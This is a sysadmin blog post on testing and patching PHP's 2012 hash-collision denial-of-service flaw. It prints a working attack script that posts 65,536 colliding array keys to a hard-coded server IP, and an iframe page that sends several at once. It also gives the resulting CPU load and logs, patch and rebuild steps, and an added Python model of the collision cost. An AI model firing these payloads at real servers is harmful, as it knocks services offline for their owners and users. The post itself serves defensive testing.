PHP hash vulnerability: testing and patching
2012-01-07 08:26
PHP hash vulnerability test environment:
IP: xx.xx.31.167, Nginx 0.8 + PHP 5.2.14, 4 CPUs.
I. Before patching:
# curl --head http://127.0.0.1
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 06 Jan 2012 06:10:09 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.14
PHP version 5.2.14, load 0.
Attack code used for testing:
Download link: http://www.linuxso.com/linuxbiancheng/15500.html
1) The dos.php script; pow(2,15) builds the POST data that causes hash collisions
<?php
$size = pow(2, 16);
$array = array();
$argument = ''; // POST body, built up in the loop below
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://115.238.31.167/test.php");
for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) {
    #$array[$key] = 0;
    $argument.="a[".$key."]=0&";
}
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $argument."1=1");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, '0');
curl_setopt($ch, CURLOPT_USERAGENT, 'API REQUEST(CURL)');
$return['result'] = curl_exec($ch);
$return['code'] = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
?>
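Test with a single concurrent connection to http://xx.xx.31.167/dos.php?a=.1. Result: a single php-cgi process, with a single CPU at 100%.
With two windows open making concurrent connections, there are two PHP processes and two CPUs are both at 100%.
2) The ddos.php script; PHP simulates POST submissions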
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>DDOS</title>
</head>
<body>
<?php
for($i=0; $i<5; $i++){ // number of concurrent requests
    echo '<iframe src=\'#\' scrolling="false" frameborder="1" allowtransparency="true" style="background-color:transparent;"></iframe>';
}
?>
</body>
</html>
Test result when visiting http://xx.xx.31.167/ddos.php:
xx.xx.31.167 - - [06/Jan/2012:14:04:27 +0800] "POST /test.php HTTP/1.1" 502 191 "-" "API REQUEST(CURL)" "-"
xx.xx.194.180 - - [06/Jan/2012:14:04:27 +0800] "GET /test2.php HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17" "-"
xx.xx.31.167 - - [06/Jan/2012:14:05:26 +0800] "POST /test.php HTTP/1.1" 502 191 "-" "API REQUEST(CURL)" "-"
xx.xx.194.180 - - [06/Jan/2012:14:05:26 +0800] "GET /test2.php HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17" "-"
With PHP simulating the POST submissions, all CPUs are instantly at 100%.
II. Applying the patch
1. Patch download location (back up the relevant PHP configuration files before applying it): https://github.com/laruence/laruence.github.com/tree/master/php-5.2-max-input-vars
2. Steps:
Stop the PHP service:
# /usr/local/php/sbin/php-fpm stop
Enter the source directory:
# cd /tmp/php-5.2.14
Apply the patch:
# patch -p1 < ../php-5.2.14-max-input-vars.patch
Rebuild:
# ./configure --prefix=/usr/local/php --with-config-file-path=/usr/local/php/etc --with-mysql=/usr/local/mysql --with-mysqli=/usr/local/mysql/bin/mysql_config --with-iconv-dir=/usr/local --with-freetype-dir --with-jpeg-dir --with-png-dir --with-zlib --with-libxml-dir=/usr --enable-xml --disable-rpath --enable-discard-path --enable-safe-mode --enable-bcmath --enable-shmop --enable-sysvsem --enable-inline-optimization --with-curl --with-curlwrappers --enable-mbregex --enable-fastcgi --enable-fpm --enable-force-cgi-redirect --enable-mbstring --with-gd --enable-gd-native-ttf --with-mcrypt --with-openssl --with-mhash --enable-sockets --enable-pcntl --with-xmlrpc --enable-zip --enable-soap
# make clean
# make ZEND_EXTRA_LIBS='-liconv'
# make install
Check whether the configuration files were overwritten by the install. Start the php-fpm service.
# curl --head http://127.0.0.1
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 06 Jan 2012 08:05:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.14p1
The patch has been applied: 5.2.14p1.
Run the PHP hash attack test again:
Visit http://xx.xx.31.167/ddos.php
Very effective; there is no longer any impact.
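Why the keys spaced by $size are so expensive to insert, and why a cap on input variables bounds the cost, shown as an added example that is not part of the original post or of the patch. It is a simplified model that assumes a chained hash table which picks the bucket from the low bits of an integer key, as PHP 5.2's array implementation does; the function names and the limit of 1000 are assumptions, and the cap is modelled as dropping variables past the limit.

```python
# Added example: simplified model, not PHP's actual HashTable implementation.
STEP = 2 ** 16  # key spacing used by the page's dos.php ($size)

def insert_cost(keys, max_input_vars=None):
    """Insert integer keys into a chained, power-of-two-sized table and return
    the number of key comparisons made while walking bucket chains.
    max_input_vars models the patch (assumption): variables past it are dropped."""
    if max_input_vars is not None:
        keys = keys[:max_input_vars]
    size, count, comparisons = 8, 0, 0
    buckets = [[] for _ in range(size)]
    for key in keys:
        chain = buckets[key & (size - 1)]   # bucket = low bits of the key
        for existing in chain:
            comparisons += 1
            if existing == key:
                break                        # key already present
        else:
            chain.append(key)
            count += 1
        if count > size:                     # grow and redistribute
            size *= 2
            old, buckets = buckets, [[] for _ in range(size)]
            for b in old:
                for k in b:
                    buckets[k & (size - 1)].append(k)
    return comparisons

def worst_case(n):
    """Comparisons when all n keys share one bucket: 0 + 1 + ... + (n - 1)."""
    return n * (n - 1) // 2

def spaced_keys(n):
    """Keys 0, STEP, 2*STEP, ...: identical low 16 bits, so one shared bucket."""
    return [i * STEP for i in range(n)]

if __name__ == "__main__":
    n = 2000  # constructed sample size, small enough to simulate quickly
    print("sequential keys:", insert_cost(list(range(n))))
    print("spaced keys:    ", insert_cost(spaced_keys(n)))
    print("spaced, capped: ", insert_cost(spaced_keys(n), max_input_vars=1000))
    print("2**16 spaced keys (computed):", worst_case(2 ** 16))
```

The cost grows quadratically with the number of accepted variables, so the cap does not remove collisions; it keeps the work per request small enough that a single request can no longer occupy a CPU.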
This article comes from the “E人空间” blog; please be sure to retain this source: http://iceeggplant.blog.51cto.com/1446843/759523